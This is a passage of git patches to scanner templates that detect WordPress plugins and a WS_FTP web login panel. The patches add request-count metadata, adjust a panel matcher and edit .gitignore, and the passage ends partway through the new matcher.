   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 2276545093..017cf76f11 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
+    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 6396390240bf5897e927a58fa855962f336650d1 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 1 Oct 2023 17:36:17 +0530
Subject: [PATCH 0632/1090] matcher update

---
 .gitignore                                    |  3 ++-
 .../ws_ftp-server-web-transfer.yaml           | 19 +++++++------------
 2 files changed, 9 insertions(+), 13 deletions(-)

diff --git a/.gitignore b/.gitignore
index 31e1cc8224..00d07ddecb 100644
--- a/.gitignore
+++ b/.gitignore
@@ -2,4 +2,5 @@
 .DS_Store
 local/
 .checksum
-.new-additions
\ No newline at end of file
+.new-additions
+*.txt
\ No newline at end of file
diff --git a/http/exposed-panels/ws_ftp-server-web-transfer.yaml b/http/exposed-panels/ws_ftp-server-web-transfer.yaml
index d4bd5e7f02..a4e47bd9ff 100644
--- a/http/exposed-panels/ws_ftp-server-web-transfer.yaml
+++ b/http/exposed-panels/ws_ftp-server-web-transfer.yaml
@@ -15,6 +15,7 @@ info:
     vendor: progress
     product: ws_ftp
     shodan-query: http.title:"WS_FTP Server Web Transfer"
+    censys-query: services.http.request.uri="*/ThinClient/WTM/public/index.html"
   tags: panel,ws_ftp
 
 http:
@@ -22,17 +23,11 @@ http:
     path:
       - "{{BaseURL}}"
 
-    host-redirects: true
+    redirects: true
     max-redirects: 3
-    stop-at-first-match: true
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - 'WS_FTP Server Web Transfer Client'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
